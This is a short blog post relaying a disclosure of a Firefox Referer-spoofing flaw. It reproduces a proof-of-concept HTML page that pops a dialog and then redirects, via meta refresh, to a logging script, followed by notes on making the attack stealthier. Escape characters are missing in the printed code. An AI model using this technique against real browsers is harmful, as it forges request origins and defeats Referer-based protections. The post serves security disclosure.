Referer Spoofing Using JavaScript

Just read an interesting article on the awesome pseudo-flaw.net that you might enjoy. Even though at the moment I'm more into AJAX and simple behavioural unobtrusive javascript as opposed to java, I still remember how excited I was back in 1995 when Sun released both beta and alpha Java versions to the public.. In fact I still have my Java 1.0 Unleashed book, which I'm looking at right now.

Javascript is such a fun language to play with and experiment with, I just don't see the value in hacking javascript to do blackhat stuff.. I really don't see the value in doing any blackhat stuff for the simple reason that its not worth the risk. I really admire the hackers who freely give their time, energy, and expertise to improve the security of free software such as Mozilla Firefox.. it's fun to see what other people are discovering.. Check it.

pseudo-flaw.net

Proof Of Exploit Code

<html>
  <head><meta http-equiv="Refresh" content="1;url=http://www.askapache.com/">
  </head>
  <body>
    <script defer="1">
      setTimeout(function() {
      // from The Jungle Book, by Rudyard Kipling
      var text = "";
      text += "At the hole where he went inn";
      text += "Red-Eye called to Wrinkle-Skin.n";
      text += "Hear what little Red-Eye saith:n";
      text += ""Nag, come up and dance with death!"n";
      text += "n";
      text += "Eye to eye and head to head,n";
      text += "   (Keep the measure, Nag.)n";
      text += "This shall end when one is dead;n";
      text += "   (At thy pleasure, Nag.)n";
      text += "Turn for turn and twist for twist-n";
      text += "   (Run and hide thee, Nag.)n";
      text += "Hah!  The hooded Death has missed!n";
      text += "   (Woe betide thee, Nag!)n";
      prompt(text);
      var t=new image();
      t.src='http://topsites.blogflux.com/track_96716..gif';
      location="http://pseudo-flaw.net/firefox-referer-spoofing/log-request-info.cgi?title=Request+Info:+Quickly";
      }, 900);
      </script>
    </body>
</html>

Notes

  • Only the GET request method seems to be affected. There does not appear to be any mechanism to submit POST data.
  • If the user's browser is configured to not submit Referer information (e.g., network.http.sendRefererHeader=0), these attacks obviously do nothing.
  • The attack will fail if the user forcibly kills the browser, turns off her machine or severs her Internet connection before dismissing the dialog box.
  • The examples use dynamically generated iframe for demonstration purposes. These attacks work equally as well for static pages or top level content (e.g., sample using meta refresh [source]). Unfortunately, it is not as stealthy.
  • The meta refresh approach is most desirable, because the initial request is submitted without any referer information making the attack more difficult to detect.
  • These examples use intentionally goofy text. A real attack would use more appropriate text.
  • Invoking the "Joke Method" twice in a row crashes MineField/3.0a9pre.

Javascript

Comments